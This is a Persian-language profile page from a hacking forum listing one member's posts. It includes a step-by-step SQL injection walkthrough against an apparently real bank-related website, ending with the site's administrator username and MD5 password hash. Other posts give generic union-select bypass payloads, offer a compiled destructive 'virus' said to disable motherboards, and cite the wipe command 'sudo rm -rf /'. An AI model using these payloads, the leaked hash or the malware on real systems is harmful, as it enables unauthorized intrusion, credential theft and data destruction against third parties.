رفتن به مطلب



iran rules jazbe modir
ADS mahak

Hamed

 عضو فعال
  • تعداد ارسال ها

    10
  • امتیاز

    258 
  • تاریخ عضویت

  • آخرین بازدید

1 دنبال کننده

درباره Hamed

  • درجه
    █▒▒▒▒▒▒▒▒▒ %1

آخرین بازدید کنندگان نمایه

255 بازدید کننده نمایه
  1. Hamed

    Race-Cracking اولین مسابقه بخش کرکینگ

    ابتدا سلام اخیرا وبسایت Pastebin مسدود شده در ایران از ف ی ل ت ر ش ک ن استفاده کنید . لطفا از این پس قبل از ارسال پست بررسی های ابتدایی رو انجام بدید .
  2. Hamed

    Race-Cracking اولین مسابقه بخش کرکینگ

    راهنمایی : از این نوع Encoding بیش تر در ارسال توییت برای پنهان کردن پیامی در پیام دیگر ، در تویتتر استفاده می شود . مسابقه تا 30 آبان تمدید شد .
  3. با سلام خدمت دوستان گرامی مسابقه ی کرکینگ از جمله مسابقات و CTF های مطرح هستش که طرفدار های خاص و باهوش خودش رو داره . از این رو سعی شد مسابقه ی ترکیبی کرکینگ برای دوستان طراحی بشه . ** مسابقه ** باید هر یک از دوستان پیام متن زیر رو استخراج کنند که حاوی لینکی هست که پسورد در اون قرار داره .اولین کسی که پسورد رو پیدا کرد ، برنده مسابقه خواهد بود و 500 امتیاز به عنوان جایزه کسب خواهد کرد . Message مدت زمان مسابقه حداکثر یک ماه . موفق و پیروز باشید .
  4. ممنون از معین جان به ترتیب مراحل نفوذ رو انجام و لینک های اثبات رو قرار میدم : پیدا کردن صفحه آسیب پذیر از طریق Google Dork : site:devbank.com خب میبینیم صفحات متعددی هستند که ورودی های Integer دارند ، من یکی رو رندوم انتخاب کردم از نتایج گوگل : http://www.devbank.com/products.php?subcat=57 اول از همه باید تعداد ستون ها رو تشخیص بدیم که با دستور زیر معلوم میشه که تعداد ستون ها 1 هستش : http://www.devbank.com/products.php?subcat=57+order+by+1-- در مرحله ی بعد باید ورژن دیتابیس رو تشخیص بدیم که آیا بیش تر از 5 هستش یا کمتر چون نحوه ی نفوذ به دیتابیس های ورژن 5 به پایین متفاوت با ورژن 5 بخ بالا می باشد : http://www.devbank.com/products.php?subcat=-57+union+all+select+version()-- همونطور که ملاحظه می کنید ورژن دیتابیس بیش تر از 5 هستش بنابراین ما تیبلی با نام Information_schema خواهیم داشت که اسامی سایر تیبل ها و دیتابیس ها رو در خودش ذخیره کرده . در این مرحله اسامی تیبل ها رو استخراج می کنیم : http://www.devbank.com/products.php?subcat=-57+union+all+select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()-- اسامی تیبل ها : category,company,doc,faq,jobs,menu,news,newsletter,publication,rates,subcat,sublevelone,submenu,subscribers,topic,usergroup,users,vacancies خب تیبلی که احتمالا یوزر و پسورد مدیر باید توش باشه تیبل users هستش . حالا باید columns های تیبل users رو استخراج کنیم : http://www.devbank.com/products.php?subcat=-57+union+all+select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273-- اسامی ستون های تیبل users : userid,username,psswd,email,fullname,groupid,userdesc,userstatus,userpin در مرحله ی آخر نوبت استخراج اطلاعات داخل ستون های username , psswd هست که با کوئری زیر بدستش میاریم : http://www.devbank.com/products.php?subcat=-57+union+all+select+group_concat(username,0x3a,psswd)+from+users-- این هم یوزر و پسورد مدیر که به صورت هش MD5 هستش و دوستان می تونند هش رو اگه تونستند کرک کنند تا پسورد مدیر رو بصورت Plain text بدست بیارند : administrator:3d2f6613711ef7274279c3b9660175ad امیدوارم از این آموزش لذت برده باشید . این مسابقه در سطح پایین طراحی شده بود که با این وجود متاسفانه دوستان تلاشی برای شرکت در مسابقه از خودشون نشان دادند . از این پس مسابقاتی در سطح بالا تر در نظر گرفته خواهد شد . یا علی //
  5. با سلام و تشکر خدمت معین جان . باید این نکته رو هم بنده اضافه کنم که این بایپس در بیش تر اوقات با Snigle quotation ( ' ) همراه هست و در مواردی هم با بایپس منطقی همراه میشه . برای مثال : www.site.com/index.php?id=1'+union+select+1,2,3,4,5--+ و با بایپس منطقی به صورت : www.site.com/index.php?id=1'+and+1=2+union+select+1,2,3,4,5--+ به جای بایپس منطقی یعنی ( 1=2 ) می تونیم از ( - ) هم به صورت زیر استفاده کنیم که کار دستور بالا رو انجام میده : www.site.com/index.php?id=-1'+union+select+1,2,3,4,5--+ *** موضوع به بخش دیتابیس هکینگ منتقل شد .
  6. Hamed

    Hacking-Virus (ویروس) مادر برد رو از کار میندازه?

    این دستور تقریبا مثل دستور : sudo rm -rf / هستش در لینوکس که کل سیستم رو پاک میکنه . در واقع هر چی که داخل دایرکتوری اصلی هستش .
  7. Hamed

    Hacking-Virus (ویروس) مادر برد رو از کار میندازه?

    باسلام ... ممنون از شیخ شاهین . من برای راحتی دوستان ویروس رو به فرمت اجرایی exe. کامپایل کردم و پیوست کردم . هر گونه پیامد حاصل از اجرای برنامه به شخص مجری مربوط شده و Anonysec مسئولیتی نمی پذیرد . لینک اثبات فایل : https://www.virustotal.com/en/file/c9aaf1fb9a45081102798973b471d3a1b32f159e9a6f8b7f90d3f2bfda7d9e88/analysis/1492672494/ Virus.zip
  8. با عرض سلام انجمن دیتابیس هکینگ با هدف آموزش نفوذ و patch کردن آسیب پذیری های مرتبط با دیتابیس ها ایجاد شده است . هر یک از اعضا برای فعالیت در این گروه موظف به رعایت قوانین زیر می باشند : 1- برای ایجاد هرگونه پست جدید ، قبل از ارسال با مدیران انجمن حتما هماهنگ شود . 2- هر یک از اعضا پس از ارسال post بایستی منتظر جواب بمانند و از ایجاد هرگونه spam پرهیز کنند . 3- رعایت ادب هنگام پرسیدن سوال و پاسخ دادن به سوالات الزامی می باشد . 5- فعالیت اعضا دیده خواهد شد و در صورت تشخیص ارتقا خواهند پیدا کرد . 6- از قرار دادن تارگت های ایرانی پرهیز شود . 7- قوانین به صورت پویا می باشد و در صورت لزوم تغییر خواهد کرد . موفق و پیروز باشید .
×
×
  • جدید...